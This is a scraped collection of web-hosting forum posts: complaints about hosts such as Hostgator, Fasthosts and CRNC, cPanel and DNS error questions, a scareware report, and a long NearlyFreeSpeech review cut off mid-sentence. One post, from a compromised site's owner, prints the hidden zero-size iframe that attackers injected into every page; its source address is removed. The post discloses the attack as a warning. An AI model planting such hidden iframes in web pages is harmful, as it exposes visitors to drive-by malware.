Warning. Hostgator
My opinion: Do NOT EVEN CONSIDER using HOSTGATOR. My experience: I signed up for their hosting on Sunday morning and completed payment for the first month using hostgators online payment system and paypal. The payment was accepted and confirmed. An email was sent some time later confirming the account had been set up. The email specified a user ID for cpanel as well as nameservers which I used to point two of my domains at the new hostgator account. I used cpanel and FTP to set up the add-on domain, create some email accounts and upload content for the two domains (the same content as on the old servers which should now be shown k-free.co.uk and offshoreharry.com). All appeared to work fine with no problems. I could use outlook to access email and the web sites were available on the new server (the old server was down). A day and a half later, I WAS HORRIFIED TO SEE - the emails accounts could not be accessed - the cpanel user did not work - Hostgator did not email me or attempt to contact me in any way to tell me there was an issue. (they had my valid mobile phone number - there are no unidentified calls in the period concerned). - the web sites that had been pointed at hoistgator were showing a suspended message and spammy hostgator context ads. My non-spam mostly non-ads content had been uploaded to the hostgator account. One of those domains is freeware software on a site with ZERO ADS that has never been moneterised and sometimes gets 100's of uniques a day. HOSTGATOR WAS STEALING TRAFFIC FROM MY ad free unmonetized site and showing a nasty spammy ad page. Not only was I rather angry but also amazed that any company would ever do this. Just think how you would feel if all your sites - pages were hijacked and showing some of the nasty ad pages. My opinion: Do NOT EVEN CONSIDER using HOSTGATOR. Checking my yahoo email, there was no email from hostgator saying my account had been suspended (if I hadn't checked it they would have continued stealing the traffic until I noticed). The only email from hostgator was a request for a copy of my passport or utility bill! I am left wondering if they are really a front for an identity theft scam? I am rather unhappy that they have even my name - address - tel no - paypal email. I obviously immediately changed the nameservers on the two domains back to the old servers. But since nameserver changes take upto 72 hours to fully propogator, hostgator could still be stealing some of my traffic now. The two sites contain nothing that any T+C I have ever seen would have any reason whatsoever to see as a problem. The two sites are k-free.co.uk and offshoreharry.com for anyone here who wishes to verify this claim. Hostgator COULD be showing my content instead of their spammy ads - I uploaded it. Hostgator was mentioned by a few on here and I thought them to be a big company who have a reputation to protect. Are you guys really comfortable with a company who behaves like this. Will they suddenly suspend your sites tomorrow and steal your traffic until you happen to notice? I have requested to them that they provide access TO MY PERSONAL AND BUSINESS EMAILS on the email accounts I set up. I would also like any log data that was collected. I will report back here what the response to that (politely worded) request is. Giving me access to any email and log data that they have effectively kidnapped-stolen hardly makes amends for the wrong they have already done. Like any other victim of a common thief I may just have to accept that I lost something and will not see it again. Additionally, search engine robots may have visited the sites and got 404s, any users who dropped by will certainly not be back, the damage caused is ongoing and difficult to fully quantify. Hostgator did not email me or attempt to contact me (they had my valid mobile phone number). They did not tell me why the account was suspended and the trafic STOLEN. I have had web sites for 4-5 years and have never been involved in anything remotely dubious on the web. You can judge for yourself if there is any reason for them to do this [sites offshoreharry.com, k-free.co.uk]. I had sent at most 10 emails whilst testing the 3 or 4 email accounts I was creating. Obviously I will never use hostgator or any related company. My opinion: Do NOT EVEN CONSIDER using HOSTGATOR ... EVER.

Netfirms Warning
I recently ran into some problems: - They doesn't support custom installation of PHPMyAdmin on their servers (You MUST use their own admin panel/pre-installed PMA or activate remote connexions) I'm not sure to understand why PMA doesn't work, but when you create a PHP Script, you must use "MYSQLHOST" as the server host, instead of the usual "localhost". I think that PMA doesn't use the mysql_connect way to connect to the database. So maybe they doesn't allow TCP or Socket connection. Anyway, that said, if you don't need a custom installation of PMA, you're OK for that point. - They doesn't support the PHP FreeTypeLib, if you plan to generate image with the GD lib and add some text into it, it may be hard to get a decent result. ( Here I'm thinking of anti-bot confirmation code ) - They doesn't offer any uptime guarantee, and they have no policy in case your server will encounter sporadic down time (just the one I used did for the past 2 weeks) ... And it would be so much a problem if they where offering a reliable service and/or if they where standing behind their costumers. For that, I've been a little deceived. { More about the down time experience: So we have contacted the support team, who said that the site is working well at the moment where we called. They doesn't seem to understand what an intermittent problem is. They said that, as they doesn't see the trouble at the time of the call, they canot do anything (I was expecting them to place an http probe/monitor or something) They asked us to take a screenshot of our browser next time that we encounter a down time. ( yes, I'm NOT kidding... a screenshot ! That's what I call technical support } I'm not ready to say that they are a bad hosting service, but, they are a little special as you see.

Warning About Universerve.Inc
This company has acquired a lot of smaller hosting companies over the last few years including budget only2dollars. Be warned they have ceased responding to support requests, none of the contact links work (even for sales) and they are not even responding to faxes. It is still possible to automatically purchase hosting via web forms of the companies they own. I could be wrong but it has all the hallmarks of a company in trouble and I would be very careful about purchasing any hosting with them until the situation becomes clearer.

HostGator Warning
It takes a lot to piss me off, and HostGator's done it. I opened an account with HostGator on behalf of a client of mine. Then the client decided he wanted to consolidate a few other web sites to the same server, so I opened a reseller account on HostGator and asked them to move the original account into the reseller account. My client got billed for both the original (empty) account and the reseller account. HostGator's sales account is refusing to refund my client the money for the original account saying that I neglected to fill out a "cancellation request" form. But, and perhaps this was silly of me, I assumed that when you move a hosting account into a reseller account, they'd close the original account. Or at least TELL you that you had to fill out a "cancellation request" form. They're referring to some paragraph in my original "contract" with them that mentions this cancellation request form. So, they may be technically right, but it seems to me that asking for an account to be moved into a reseller account would constitute a cancellation request. Now, let's give them the benefit of the doubt, and that I should have gone back to my original agreement with HostGator and noticed that I was obliged to fill out this cancellation request. Even so, I'm planning on canceling another account I have with them over this I'm so pissed. So by not refunding a lousy $14.95, they're losing a customer for life. Somehow that doesn't sound smart. And I'm so tired of dealing with stupid people or companies. I just won't do it. There are too many other web hosts out there for me to put up with this kind of attitude.

Warning 3ix
A while ago i had signed up with the affiliate program of 3ix.com webhosting. After a few months some commisiions had been confirmed insid their panel, when all of a sudden further access had been denied. Since two months they keep on mailing lies such as the affilate manager will respond, we are working on it etc. But now they no longer respond and it seems, that 3ix.com will be vanishing soon with more and more complaints arriving at the FBI internet fraud department. Certainly not a host, that deserves any trust.

Fasthosts: A Warning
At 6pm last night - more than 28 hours ago - my Dedicated Fasthosts server went down. It's still down. Despite more than 15 phone calls and several emails, they seem utterly incapable of fixing the problem. The system drive apparently failed and was replaced today with a new drive. I then rebuilt the Linux Fedora Core and Fasthosts proceeded to add the faulty drive to the server - at my request. However, after confirming that the drives had been installed and that the server was ready for use, guess what? It's still down. So not only do I currently not have a website, but my developer cannot access the failed drive in order to see what can be recovered. I'm at the point of telling Fasthosts to stick it, but I'm not going to do that because it's their responsibility to fix their hardware and provide the service I've been paying for since 2006. That being the case, can anyone recommend what steps I should take next in order to hold Fasthosts to account.

Justhost Warning
I would just like to give you a little warning about justhost.com. This is my experience, but I think I was just very unlucky. I signed up last Thursday, everything seemed to be great. When signing up it said that everything will be setup within 24 hours. The money was withdrawn and I got a confirmation email from paypal. After 30 hours I still haven't heard anything from the justhost. I checked a whois for the domain I had signed up for; it still wasn't registered. I chatted with one of their agents. I have mixed thoughts about the agents. They respond really quickly which is great, but they don't seem to have any privileges to do anything. They will only answer your questions and they will tell you who to email if something is needed to be done (from my experience). The agent said that I should email their billing section. So I emailed them, but I didn't get any response to that ticket. After 3 days I talked to an agent again. Same story; email billing. But they said everything will be setup within the next 24 hours. I emailed them again... After 4 days (still nothing had happened) I talked to an agent again. He said he can't find the information about me. So I patiently emailed them my info again. After 5 days I talk to an agent once again. I started asking why nothing has happened. After I started getting a little angry over the chat (because nothing was happening) he shut down the conversation. I then emailed their billing team to say I want a full refund. The refunding worked better than I would expect (since nothing had worked before). My money was refunded on paypal about 24 hours later. They apologized in the email and said that this is very unusual. I feel that it's very unprofessional to charge a customers credit card and then lose the information about the customer and not doing anything about it.

SOA Warning
dnsreport(.com) displays this warning for my domain: Quote: WARNING: Your SOA (Start of Authority) record states that your master (primary) name server is: server1.[domain].com.. However, that server is not listed at the parent servers as one of your NS records! This is legal, but you should be sure that you know what you are doing. Although I've created an SOA in my Windows DNS Console. Whats it then? Also, it says: Quote: ERROR: I couldn't find any MX records for [domain].com. If you want to receive E-mail on this domain, you should have MX record(s). Without any MX records, mailservers should attempt to deliver mail to the A record for [domain].com. I can't continue in a case like this, so I'm assuming you don't receive mail on this domain. Whereas I've already created an MX record - mail.[domain].com

Warning For Sysregistry.com
This morning I started my PC to find a little icon in the taskbar of my pc. It looked like a shield and showed a popup message with the contect "Your computer is infected Windows has detected spyware infection which corrupted the registry. It is recommended to load update to prevent data loss Windows will now download and install the most up-to-date software for you. Click here to protect your computer" Note that the text above was typed exactly as shown on the screen. The explanations within this registry cleaner from sysregistry.com contains broken english bits and peaces. So I did what probably most users do and clicked on it. The tool then downloads itself and starts up. Later when I looked at my C drive I found also other software that was downloaded (at the same time) twxi.exe qcfvf.exe dlkxp.exe jelwtpj.exe xvggujq.exe mbvesb.exe jrobixo.exe The software would redirect you to the homepage at sysregistry.com where you can conviniently pay with your CC card. ;-) First of all I dont recall having personally invited this peace of software to sit down on my pc, so I certainly didnt feel like inputting my cc details on their homepage. What I did is try some free or shareware tools that took care of that problem. I wanted to research more, but the Whois DNS doesnt seem to work right now.

What Do These Warning Emails Mean
I have a site hosted on a vds with Godaddy. For the past couple of months, every single day I get at least 12 emails coming though with the subject title - 'Status warning from ip-218-119-109-95.ip.secureserver.net' each email reads something as follows - System integrity monitor on ip-218-119-109-95.ip.secureserver.net has taken action in responce to an event. Recent event logs are enclosed below for your inspection. There has been 10 events today, if an average of 8 events is reached, e-mail alerts will be terminated for the duration of the day. > > - Events Summary: > Total event count: 10 > Average event count: 3 > > - Service Summary: > HTTP [restarted - 8 events] > DNS [online - 1 events] > MYSQL [online - 1 events] > > - System Summary: > No system modules enabled - edit conf.sim > Can anyone tell me what on earth these emails mean? I don't get much sense out of Godaddy when I ask, they just state it is a monitoring system in place. I really would like to know what all these emails refer to? is it a regular happening, or something to be worried about, or what the heck do they mean? Would really appreciate if you don't be too technical in your answer as I'm not too familiar with a lot of hosting issues. (Also please note I have altered the ip address in the email details for privacy reasons). Basically all i want to know is this something I should be worried about?

Isn't it fair to expect this?

Why Do I Get An Open Relay Warning

This was for an out-of-the-box cpanel/exim configuration on a dedicated server. Can someone help me understand how this warning is detected/tested for, and what I can do to resolve it? My understanding was that cpanel will not set up an open relay by default?

Fasthosts.co.uk Rip Off Warning
I ordered a server from fasthosts.co.uk in May after speaking to their sales over the phone. Once I had worked out that it was something that we could try I said that’s fine I will order it online. NO NO I was told I can order it for you here and set everything up for you. Great... I gave the girl I think her name was Flik or Flic from fasthosts all my details and she set everything up in a few hours. GREAT Now here is the bad part... Tried to cancel the server and have been told that it's a minimum term of 12 month. I have also been charged since then another Ł79.00. Called my credit card company to try and stop the transactions for now as you can't delete the details on the fasthost control panel. I have email support so many times and also spoken to them on the phone. I have tried to speak to other managers but they keep saying that there is no ones available to talk to. My main post is I was not told that this was a minimum of 12 months and would have never agreed to this. I did check when you sign up online and they do place the T&C's deep in their small print. I now know why the girl from Fasthosts wanted to take the order over the phone. Here is my letter I send to them. Next step is ofcom but if you have any ideas please let me know. Dear Fast Hosts I am writing to you in regards to a server that I ordered over the phone with one of your sales people in April. As I recall her name was Flick and her contact number is 01452 561831. I ordered this server to use as a back up for some of our company files and discussed this with your sales staff. We agreed that getting a Windows server was the best option for what we needed and the server was ordered over the phone. We were not too sure if the server was what we needed but we thought that we would give it a go and see. After a week or so I released that we didn’t really need the server as we could use our public folders with the exchange email service that we have with you and if we ran out of space I could always buy some more. I sent an email to you on 30th May requesting cancellation and received an email back 2 days later advising me that it was a minimum one year’s contact. I have since sent several emails to your support and sales explaining that I was never told that this was a year contact as I ordered on the phone. I was not even told the price. It's simple... How can I agree to those terms and conditions when I was not made aware of them? I would have never agreed or signed up for a year's contract. I have not used this server and only wanted to try it out. When I ordered over the phone I was never told that it was for a year. Your calls must be recorded and you can check. I am a consultant for a large mobile operators call centre in ******* and this is poor service. Please cancel this server and review your sales policies as they are against trading standards. I also notified you about the cancellation on 30th May and was charged for another month on 4th June. Please arrange a refund for that month to avoid charge back. I am happy to pay the first months payment. I have other services with Fast Host that I have had for several years. We are a web company and do recommend Fasthosts for UK hosting as we have had a great experience with you in the past. The credit can be applied to our exchange hosting account domain gsynetwork.com and I believe that the username is ******** Regards This is the type of reply you get back…… What a joke…… Further to your mail , All of our servers are subject to a 12 month minimum term , part of using this server is the acceptance of the terms of service which we operate subject to the normal cooling off periods associated with purchasing products and services over the phone or online. As you have gone beyond this period I cannot authorise the removal of this machine from contract.

Warning: CheapVPS.co.uk Suspend Me
I purchased a second VPS with cheapvps.co.uk for Ł31.73 (including managed service). I bought the 2nd vps, because my first one crashed for some reason. After 7 days of misconfigured 2 vps systems I asked for a complete and full working VPS or a refund and they suspend me on all 2 systems without getting a refund. That is not nice. Edit: I got a refund, today but only 11.73 of 31.73, because DirectAdmin will be cost now $20 instead of $10, if it is an refund issue. One really bad part of the TOS, if you want to get a refund (Note, that they it will cost you only 5 pounds, while purchase a VPS, but they double the pricing, if you ask for a refund!): The 7 day money back is offered on all managed and semi-managed VPS accounts. The money back does not cover unmanaged VPS. Control panel fees will not be refunded. cPanel and DirectAdmin are valued at $20/mo with a $20 setup. RVSkins and Fantastico are counted as control panels and have an associated cost of $2 each should they be active on your account.

Warning: Avoid Amerihost.com
So I've had a VPS with Amerihost for a while. I found a better deal, here actually, for a real server. I migrated my accounts and submitted my cancellation to Amerihost.com on April 30th. My account was set to bill on the 11th of May, so I wanted to make sure I didn't bill again. Here is the first cancel ticket: April 28th: [SUPPORT #XRQ-191822]: Support Request [url] Appears to have been deleted. Here is another ticket I submitted after the first was ignored: April 30th: [BILLING #IBJ-172957]: 2nd Request: Cancel my account I had a conversation with them on this one making it QUITE clear I wanted to cancel, immediately. 8 parts, all still in my GMail account. Then I get this a few days ago: Dear xxxxx, This is a notice that an invoice has been generated on 05/16/2008. Your payment method is: Credit Card Invoice #913 Amount Due: $45.00 USD Due Date: 05/17/2008 Obviously, they never cancelled the account. I open yet another ticket, telling them to cancel and threatening chargeback: May 15th: [BILLING #SGJ-247744]: Re: Customer Invoice Also appears to have been deleted. Now I got this: Dear Brian Teeter, This is a payment receipt for Invoice 913 generated on 05/16/2008. The payment has been taken from your card on record with us automatically. Amount: $45.00 USD Status: Paid So, basically they ignored my repeated, multiple requests for cancel. Even after I talked with one of them. They still charged my card. Avoid these jokers at all costs. I'm going to the bank tomorrow and I will be getting the charges reversed.

New CPanel/WHM Warning
first time I discovered the issue and I am not happy about it at all. I was moving three of my largest sites over to a new server after performing a full cPanel backup of them completly and then FTP'ed the backups over and restored them in WHM on a new server; however, NONE of the MySQL data was saved. Now at this point I was not really worried because I knew I had weekly and daily backups so at most I was going to lose 1 month of SQL. come to find out, NONE of the weekly or daily backups had the SQL eaither despite the fact that they are instructed to backup everyting. This leaves me with only three month old backups for these huge websites that are getting 2million+ hits a day. Basically, I'm done. I relied on cPanel/WHM to perform full backups which it did not. I followed all the procedures about having backups offi site and whatnot, but NONE of them have the SQL. I am very upset, perturbed, and disappointed with the new cPanel/WHM and never should have upgraded. I suggest anyone using it to do your own backups and do not rely on cPanel/WHM despite how tempting it may be. my one mistake was to delete the websites off the server before they were fully restored (just so I would not have to turn off DNS clustering and whatnot). I should have checked if they were up working on the server before I deleted them off the old one. (Although I kept all the backups so I figured that would be enough).

Cpanel Hdd Warning Message
I getting error from cpanel now about possible hard drive failure.First it was only secondary disk,so i send request to support to ask them why is that happening and they said it is just temperature warning, but they still checked disk.Testing took 3 hours, and support said everything is ok. But now i start to receive again that message, and now not just secondary disk, also primary disk.So what should i do,should i just ignore that error considering now is summer and it's hot or contact support again?I am in that dilema beacuse if support will test disk that require offline testing and means server will be down again, and now even longer beacuse of both disk warning, and again if they realy fail then i will lost all data and experience much longer downtime. Here is message which i getting: ...

WARNING: One Or More Of Your Mailservers Is Claiming To Be A Host
I just got a dedicated server on dedicatednow.com a couple weeks ago and I running my own mailing list from the server. I have come accross a couple problems already and have been black listed but I know exactly why it is and am working on resolving the issue. Now... When I check dnsstuff.com for information on my dns... I get this error in one of the fields: ------------------------------- WARNING: One or more of your mailservers is claiming to be a host other than what it really is (the SMTP greeting should be a 3-digit code, followed by a space or a dash, then the host name). If your mailserver sends out E-mail using this domain in its EHLO or HELO, your E-mail might get blocked by anti-spam software. This is also a technical violation of RFC821 4.3 (and RFC2821 4.3.1). Note that the hostname given in the SMTP greeting should have an A record pointing back to the same server. Note that this one test may use a cached DNS record. domain.com claims to be host host.differentdomain.com [but that host is at 555.555.55.10 (may be cached), not 555.555.55.11]. <br /> ----------------------------------- It seems like my main hostname is mailing from only one ip address and not the dedicated ip that I've assigned to the domain i'm mailing from. So i'm wondering if there is a way for me to add an additional hostname that I can use specifically for one domain and ip address that will send mail from that domain only. While in addition, still using the regular hostname for my shared accounts that will send mail under its own ip all on the same server?

Stop Cpanel Security Warning
How do I stop the common cpanel/whm "domain mismatch" security warning popup for good WITHOUT the need to install a server hostname certificate and access through that. Is there a way to save the cert in the browser? I could not find that option and I am using Firefox 2.

Warning: My Dismal Experience With CRNC
I found CRNC through reviews on WHT, and began using them as a colo provider in April 2005. I used them for a small project, hosting only one 1U server that was to be used in the event of an outage of one of our main servers. I had a few issues with them along the way, including several outages, a forced datacenter move with little notice (from NJ to NY), and one occasion when they accidentally re-assigned our IP addresses to another customer. If this had been my primary server, their service would have been completely unacceptable. But this was a failover server, they were local, and I stuck with them. I canceled my service with CRNC in September 2006. Even after I canceled, they continued to charge my Corporate Amex each month for hosting services. This was fairly easy to stop, with the help of American Express. However, I've been trying for the last year to get a refund for the overcharges, and to get them to return the server, with absolutely no success. On two occasions, I got a response saying that my server would be returned shortly, but then they'd stop answering my emails, and the server still has not been returned. I shipped CRNC the box and packing materials for the server in October, which they lost, and then found. I've tried contacting them repeatedly since last year, without much success (except for one day in April, when they agreed to ship the server, but didn't). Finally today, I received a response. Not only would CRNC not return my money, but they now want me to pay them $250 for "storage" for all of the time they've been keeping my server. Their last email said that I haven't been persistent enough in trying to get my server back, and they have been trying to contact me to obtain a prepaid shipping label (they haven't!). They've conveniently forgotten the fact that I have emailed repeatedly with no response, and that they have plenty of my money from overcharges that could have been used to pay for shipping. From James today (September 21): Quote: We received your packaging months ago however we attempted to contact you via email and telephone in regards to a shipping label. Now seeing as this issue is almost a year old, the last 4-5 months of which we have received no correspondence back from you, we are going to have to charge a storage fee of $25/month. We made numerous attempts to release this server back to you. It obviously has not been a priority for you. We're always available via email and telephone. From December until September is $250.00, of which after $105 is deducted is $145. It is not our business to store equipment we are not being paid for. The server was your property and you made minimal effort and no follow-thru to get the server back. Please understand our viewpoint on this. We've been in business for 4 years. We're not out to harm anyone, especially former customers that could potentially come back some day. Thanks To be perfectly clear: CRNC has had the box and packing materials, the address to send the server to, and the money for shipping since last October. I've contacted them 8 times in the last 9 months (including several times in April, June, and September). I'm not certain how many unanswered emails would be considered sufficient effort, but I've spent more than enough of my time on this issue. I've been really friendly and really patient up to this point, but I can no longer accept this kind of treatment. I was a very good customer for 18 months. Each monthly bill was paid on time by credit card. I can't recall even once requesting technical support, *never* complained about the outages or forced datacenter move, and didn't complain about the hours of work their mistake with our IP's cost me. The server was almost completely unused, and our bandwidth usage was always less than 0.05% of the 2000GB I purchased each month. I met James when the server was installed in the Equinix datacenter in Secaucus, and he seemed like a really nice, technically knowledgeable guy. I've always chalked up the issues I experienced to a lack of business experience and general disorganization. However, now I'm beginning to wonder whether keeping my money and server is deliberate. A line in his email response is pretty telling to me: "The server WAS your property" (emphasis mine). There was a thread on WHT a few months ago with a somewhat similar experience where CRNC wouldn't return the customer's money or equipment. I'm truly amazed that any business treats their customers this way. Unfortunately, I do not expect this situation to be resolved without the involvement of the police and courts. It would be wise to think carefully before entrusting your equipment to this company. (Somewhat related: was CRNC recently purchased? It looks like some of their IP ranges are now owned by Atlantic Metro Communications.)

Hacked; Warning: Count.php?o=2 Code
On 4/11 at 5:30pm, my server's root was compromised and someone had a field day on my server. Surprisingly with the level of access they had, the person very quietly ran a script (I've yet to find the file, but saw reference to it in another forum about this) that updated every single .html, .htm, and *index.php file in the homes directory. I can't even count how many files were edited -- atleast 100-200 files I've had to manually change thus far. That said, I wanted to warn everyone about this. My google results were slim on this subject. What I find really surprising is that Avast! is the only anti-virus software to warn me of the possible malware being opened. I use either at home or at my office Avast!, BitDefender 2008, Symantec Corporate Antivirus, and McAfee corporate Antivirus. I just installed Avast! yesterday just for "peace of mind" and I'm damned glad that I did because it immediately popped up about HTML:iframe-gen malware on my websites. I have enabled e-mail sending whenever someone logs into the root account on my server -- which I believe I received the tutorial from here in the How-To section -- and I did receive an e-mail for the person logging into the root account via SSH, but the IP address and hostname was left blank. Does anyone know why the IP and hostname would be blank? That doesn't mean they were console, does it? Here is the HTML code that was inserted into all of my .htm, .html, and *index.php files: <iframe src=[url] width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Warning: Fsockopen(): Unable To Connect To 127.0.0.1:25
Yesterday I had to install a renewed SSL Certificate. Managed to get it installed, in Plesk under domains/www_mydomain_com, but I also deleted the default SSL from the server/certificates area... So then I was getting an dns 500 error when browsingour site and I could not start httpd from within plesk. Went in through SSH and tried to start it from there and got and error stating it could not find the SSLCA cert it was looking for. So I edited my httpd.include file to point to my new certificate. Now http works, but my email has stopped? What gives how could the two be related! I can log into my webmail, compose message and when I send I get: Warning: fsockopen(): php_hostconnect: connect failed in /usr/share/psa-horde/pear/Net/Socket.php on line 108 Warning: fsockopen(): unable to connect to 127.0.0.1:25 in /usr/share/psa-horde/pear/Net/Socket.php on line 108 I have started and stopped psa, qmail. WARNING, AVOID - Rackhosts.co.uk - John Ellison
For those looking for hosting. This is a "company" (rackhosts.co.uk ), or rather - a person to avoid. John Ellison. If you search his name here on WHT you'll see negative reviews about his service. He used to run Jehosts.com. Well, he got me today. On www.mambug.com we sell website templates. He purchased one, and as a good company we are - we sent him the email with the download information to the template. Unknowingly he had a history of bad reputation. Immediately following his download he opened a dispute with Paypal. He refused to remove the dispute. What gets me the most, is that after the dispute he continued to message me on MSN asking for help with editing the website... This kid, is just one of those people you don't want to ever have to deal with or meet. So beware.

Cpu Overload Warning Mail From Cpanel
i am continously getting warning mail form cpanel cpu watch that my cpu got overloaded as like follows, IMPORTANT: Do not ignore this email. This is cPanel cpuwatch on xxx.com! While processing, the cpu has been maxed out for more than a 6 hour period. The current load/uptime line on the server at the time of this email is 19:05:10 up 143 days, 20:38, 0 users, load average: 1.11, 0.69, 0.63 You should check the server to see why the load is so high and take steps to lower the load. If you want stats to continue to run even with a high load; Edit /var/cpanel/cpanel.config and change extracpus to a number larger then 0 (run /usr/local/cpanel/startup afterwards to pickup the changes). I searched on load average and found that average load for 1 cpu is 2 and default value is 5 to 10.but here i am getting mail for 1.11 itself.I changed the value of threshold of load average in stat and logs of tweak setting to 4.but no improvement.now also i am getting more than 4 mails for average load i.e 1.23 also My questions are: 1)what is the criteria cpanel is checking for sending cpu-watch warning mail? 2)i am getting nothing more than rsync and exim at the time of overload(while using TOP command). So why now only i am getting warning mail? what is the cause of this problem? I was getting idea from internet to create account without stat/ log analyse function .But not sure how will it work and afraid of doing this.......

[Review] NearlyFreeSpeech.net (warning: Wall Of Text)
I've been meaning to get around to this for quite some time now, and since I've got some free time I figured I'd review NearlyFreeSpeech.net Length of time with host: 4+ years Sites hosted: 5 (+/-) Basically, I couldn't be happier. They're pretty much everything that shared hosting should be. They don't oversell. They don't sell your information to advertisers. And they've got several "killer features" that few (if any) other hosts offer. Pros Performance Unlike some (most?) shared hosts, they don't cram a bunch of sites onto the same server. In fact, they don't even assign you a server per se. All sites are hosted on clusters, so the most active sites will be handled by several servers working in tandem. The load balancing is automatic transparent -- if your site starts getting a load of traffic, their servers will shift your site around as necessary to ensure that it remains responsive. This process isn't noticable at all; every aspect of their service feels like a traditional shared hosting setup, the sole exception being that performance doesn't suck. Wordpress and phpBB (notorious for bringing most shared hosting plans to their knees) feel snappy and responsive, even when faced with large amounts of traffic. Reliability They're not perfect, but they're close. I've used several other shared hosts over the years, and I can safely say that NFSN is the most reliable of all of the ones that I've used. Again, I think this has to do with their clustering setup. I've never been told "sorry, but someone on your server crashed Apache". They do get hit with DDoS attacks from time to time (as do all hosts), but it's exceptionally rare for said attacks to cause a disruption of service. When large scale attacks do occur, they handle them quickly and professionally. There have been a handful of large-scale failures over the time I've been with them, but disruptions of service are few and far between. Language Support Pretty damn good. I'd say they're best at hosting PHP/MySQL sites, but they're very, very good with all of their officially supported CGI languages [url] too. They'll also install libraries, PEAR modules, etc. upon request, even if it's something that nobody other than you will ever use. Support Support is second-to-none. Support is conducted via their administrative control panel. Although they do have official hours, it's not unusual to have your question answered quickly even at some ungodly hour of the morning. All the support staff are top-notch, and they all *definitely* know their stuff. They don't hand-hold as much as most hosts, but if you're reasonably competent and/or not afraid to learn you won't have any trouble. They've also got a panic button feature that I quite like -- from their write-up about the feature: After you hit the panic button, a ticket will be opened at "Panic" priority including the text of your message. The on-call admin will also be immediately paged with the text of your message. Then, one of three things will happen: -If you hit the panic button for a legitimate, previously-unreported system or network outage that needs our immediate attention, we will change your issue to "High" priority, refund your panic message charge, and cut the cost of your next panic message in half. -If your message does not pertain to a legitimate problem or outage that needs our immediate attention, we will change your issue to "Standard" priority, you will not receive a panic message refund, and the cost of your next panic message will be doubled. -If your message is clearly spurious ("Haha lolz I paged u!") it will be ignored and your ability to send panic messages will be revoked. You will not receive a panic message refund. Free speech / censorship Hands down, they make other hosts look like jokes. I've managed several controversial sites over the last four years, and NearlyFreeSpeech.net is the ONLY host who hasn't hassled me. The best thing I can do to promote their service is to point you to their beliefs ([url] page. Yep. No mission statements... just three simple quotes. And they really do believe in those values. They even go as far as to say this in their FAQ: You must obey all applicable local laws unless you get our prior express consent in writing. We do provide anonymous hosting of content that violates local government censorship laws at our sole discretion in cases outside the United States where we feel government censorship is contrary to the cause of freedom. Quite a departure from most shared hosts. Even more (and yes, I speak from experiene when I say that they really do hold to this): A NearlyFreeSpeech.NET member site is defaming me or otherwise injuring me civilly. Please forward a copy of your legal finding from a court of competent jurisdiction to our contact address. If you have not yet obtained such a finding, a preliminary injunction or court order is also sufficient. If you are not able to obtain the above, you will need to work directly with the site operator to resolve your differences. We will have to fall back on our members' contractual assertion that the content they upload is legitimate and therefore we will not be able to get involved. This quote really sums up their stance: A NearlyFreeSpeech.NET member site contains offensive content. At NearlyFreeSpeech.NET we firmly believe that censorship is a dangerous and misguided approach to the problems of society. We believe that the price we pay for the huge number of fantastic sites we host are a few sites that we feel are significantly less fantastic. We believe that the price you pay for living in what we hope is a free society is that when you encounter something offensive, you must resist the urge to censor it and instead research, investigate, and speak out passionately in opposition to it. That is the essence of free speech. Please do not send us abuse complaints of this nature. We will discard them. DMCA Ah yes. Everyone's favorite. Fortunately, NFS is sane about this (far more sane than some uh... "dreamy" hosts I've used...). Again, another excerpt from their FAQ (which I can also attest is true): We adhere to the entire law very closely. We do not generally pull the plug on an entire site if, for example, someone claims that a single graphic is infringing. We do our best to remove only the content that the copyright owner specifically identifies as allegedly infringing. We allow and encourage the use of the "putback notification" process when material is incorrectly identified as infringing. But we do not automatically terminate a member's service merely for receiving a complaint alleging infringement. (However, actually infringing someone's copyright does violate our TACOS and will generally result in immediate termination.) Keep in mind that while we aren't lawyers, neither are we idiots. We can tell the difference between people harassing our members via the DMCA and cases where our service is genuinely being misused, and we can adjust our attitude accordingly. Fortunately, both of these cases are very rare. Cost. This one's a big issue for folks on shared hosting, so it's worth going over. Basically, NFSN uses a pay-per-use model. Simply put, you pay for the resources you use. This does mean that you won't be able to "game the system" and hope to get away with a high-traffic site on an oversold server for a couple bucks a month. This also means that the system won't game you, and put your high traffic site on an oversold server. Most importantly, it means that you don't pay for what you don't use. Those 1000GB for $10 plans seem like a great idea until you realize that if you only use 1GB you're getting royally screwed. Pricing is a little unconventional, so it's worth going over in a bit of depth: Bandwidth Bandwidth starts at the price of $1/GB. This may seem steep if you compare them to the prices promised in the ads of various heavily-oversold shared hosts. Fortunately, it's not a flat rate. In fact, the more bandwidth you use, the lower your per-GB charge is --and the discount is permanent. They've got a bandwidth calculator [url] if you're curious about pricing. Storage $1/100MB, flat fee. MySQL $0.01/day IIRC. Their MySQL servers are top notch FreeBSD 7 boxes, and I definitely think they're worth the price. E-mail forwarding $0.01/day. You can obviously use your own e-mail servers instead, or use something like Google Apps -- but if you want them to do e-mail forwarding it costs $0.01/day with no usage cap. (And yes, I do mean no usage cap. Bugmenot.com uses NFS's e-mail servers for their "disposable mailbox" service, and they have a heck of a lot of inbound mail.) Privacy Wow. Short of bribing an off-shore host, I don't think you'll find a more private arrangement. Unless they've got a court order demanding your details, you can safely assume that they won't be divulged. Again, I speak from experience. Also interesting to note is this excerpt from their FAQs: At NearlyFreeSpeech.NET, we believe that with great power comes great responsibility, so we take a dim view of such behavior. For that reason, our TACOS require our members to provide complete and correct contact information, and requests for anonymous hosting are typically denied. However, we do make one important exception. If you live outside the United States and can demonstrate that the site you wish to host would put you at significant, legitimate risk of retaliation from a government with a documented track record of reprisal against people who speak out against it, we may be able to help. Anonymous hosting is serious business; it can be one component of a coordinated plan to protect you and your family from torture and murder. It's absolutely not an option you can use to dodge lawsuits or unpopularity arising from hosted material. I haven't (thankfully) had to depend on that level of privacy protection -- but if I did, I wouldn't hesitate to work with them. SFTP/SSH access Name says it all. Scalability To quote 'jdw', one of the founders of the service, in response to a user's questions re: scalability: It depends. If all you need is bandwidth, it should be pretty well unlimited. There have been a couple of cases where we have asked people to move on based on CPU usage, but those involved specific situations where they had a poorly-tuned application and couldn’t or wouldn’t optimize it for the load they were getting. Those were also before the days of 8-core cluster nodes. A VPS or single dedicated server would definitely not be able to serve more bandwidth. Most of them are capped to 10 or 100Mbps; our load-sharing architecture can serve a single site into multiple Gbps if the site is fast enough (i.e. static content) and you can pay for it. When they mention CPU usage, it's worth noting that it's nothing like Dreamhost and other shared hosts. You just won't hit it unless you've got a bug or you're trying to do something like calculate pi to a billion places. The limits that are in place are solely to prevent runaway/buggy apps from screwing things up -- you won't hit them, even with 